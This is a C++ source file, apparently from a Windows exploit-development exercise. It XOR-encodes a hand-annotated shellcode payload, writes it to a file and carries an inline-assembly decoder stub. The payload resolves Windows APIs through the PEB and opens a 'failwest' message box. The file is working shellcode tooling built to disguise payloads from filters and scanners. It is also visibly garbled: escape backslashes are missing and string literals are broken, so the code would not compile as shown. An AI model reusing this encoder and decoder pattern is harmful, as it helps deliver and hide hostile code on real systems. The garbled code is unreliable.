// Encoder.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
void encoder(char* input ,unsigned char key,int display_flag)
{
int i=0,len=0;
FILE *fp;
unsigned char *output;
len = strlen(input);
output = (unsigned char *)malloc(len+1);
if (!output)
{
printf("memory erro!
");
exit(0);
}
//encode the shellcode
for(i=0;i<len;i++)
{
output[i] = input[i]^key;
}
if (!(fp=fopen("encode.txt","w+")))
{
printf("output file create erro");
exit(0);
}
fprintf(fp,"""); //单引号
for (i=0;i<len;i++)
{
fprintf(fp,"\x%0.2x",output[i]);
if ((i+1)%16==0)
{
fprintf(fp,""
"");
}
}
fprintf(fp,"";");
fclose(fp);
printf("dump the encoded shellcode to encode.txt OK!
");
if (display_flag) //print to screen
{
for (i=0;i<len;i++)
{
printf("%0.2x",output[i]);
if ((i+1)%16==0)
{
printf("
");
}
}
}
free(output);
}
void decoder()
{
//==================解码器=================================================
__asm
{
add eax,0x14 //越过,记录Shellcode的起始地址
xor ecx,ecx //ecx寄存器清零
decode_loop:
mov bl,byte ptr[eax+ecx]
xor bl,0x44 //这里用0x44作为Key,如编码的Key改变,这里也要随之改变
mov [eax+ecx],bl
inc ecx
cmp bl,0x90 //在Shellcode末尾放上一个字节的0x90作为结束符
jne decode_loop
}
//==================解码器END=================================================
}
char popup_general[]=
"xFC" //cld
"x68x6Ax0Ax38x1E" //push 1E380A6A
"x68x63x89xD1x4F" //push 4FD18963
"x68x32x74x91x0C" //push 0C917432
"x8BxF4" //mov esi,esp
"x8Dx7ExF4" //lea edi,dword ptr ds[esi-C]
"x33xDB" //xor ebx,ebx
"xB7x04" //mov bh,4
"x2BxE3" //sub esp,ebx
"x66xBBx33x32" //mov bx,3233
"x53" //push ebx
"x68x75x73x65x72" //push 72657375
"x54" //push esp
"x33xD2" //xor edx,edx
"x64x8Bx5Ax30" //mov ebx,dword ptr fs[edx+30]
"x8Bx4Bx0C" //mov ecx,dword ptr ds[ebx+C]
"x8Bx49x1C" //mov ecx,dword ptr ds[ecx+1C]
"x8Bx09" //mov ecx,dword ptr ds[ecx]
"x8Bx69x08" //mov ebp,dword ptr ds[ecx+8]
"xAD" //lods dword ptr ds[esi]
"x3Dx6Ax0Ax38x1E" //cmp eax,1E380A6A
"x75x05" //jnz short shellcod.0040D48C
"x95" //xchg eax,ebp
"xFFx57xF8" //call dword ptr ds[edi-8]
"x95" //xchg eax,ebp
"x60" //pushad
"x8Bx45x3C" //mov eax,[arg.14]
"x8Bx4Cx05x78" //mov ecx,dword ptr ss[ebp+eax+78]
"x03xCD" //add ecx,ebp
"x8Bx59x20" //mov ebx,dword ptr ds[ecx+20]
"x03xDD" //add ebx,ebp
"x33xFF" //xor edi,edi
"x47" ///inc edi
"x8Bx34xBB" //|mov esi,dword ptr ds[ebx+edi*4]
"x03xF5" //|add esi,ebp
"x99" //|cdq
"x0FxBEx06" //|/movsx eax,byte ptr ds[esi]
"x3AxC4" //||cmp al,ah
"x74x08" //||je short shellcod.0040D4B3
"xC1xCAx07" //||ror edx,7
"x03xD0" //||add edx,eax
"x46" //||inc esi
"xEBxF1" //|jmp short shellcod.0040D4A4
"x3Bx54x24x1C" //|cmp edx,dword ptr ss[esp+1C]
"x75xE4" //jnz short shellcod.0040D49D
"x8Bx59x24" //mov ebx,dword ptr ds[ecx+24]
"x03xDD" //add ebx,ebp
"x66x8Bx3Cx7B" //mov di,word ptr ds[ebx+edi*2]
"x8Bx59x1C" //mov ebx,dword ptr ds[ecx+1C]
"x03xDD" //add ebx,ebp
"x03x2CxBB" //add ebp,dword ptr ds[ebx+edi*4]
"x95" //xchg eax,ebp
"x5F" //pop edi
"xAB" //stos dword ptr es[edi]
"x57" //push edi
"x61" //popad
"x3Dx6Ax0Ax38x1E" //cmp eax,1E380A6A
"x75xA9" //jnz short shellcod.0040D47F
"x33xDB" //xor ebx,ebx
"x53" //push ebx
"x68x77x65x73x74" //push 74736577
"x68x66x61x69x6C" //push 6C696166
"x8BxC4" //mov eax,esp
"x53" //push ebx
"x50" //push eax
"x50" //push eax
"x53" //push ebx
"xFFx57xFC" //call dword ptr ds[edi-4]
"x53" //push ebx
"xFFx57xF8"; //call dword ptr ds[edi-8] //nop
int main(int argc, char* argv[])
{
encoder(popup_general,0x44,1);
return 0;
}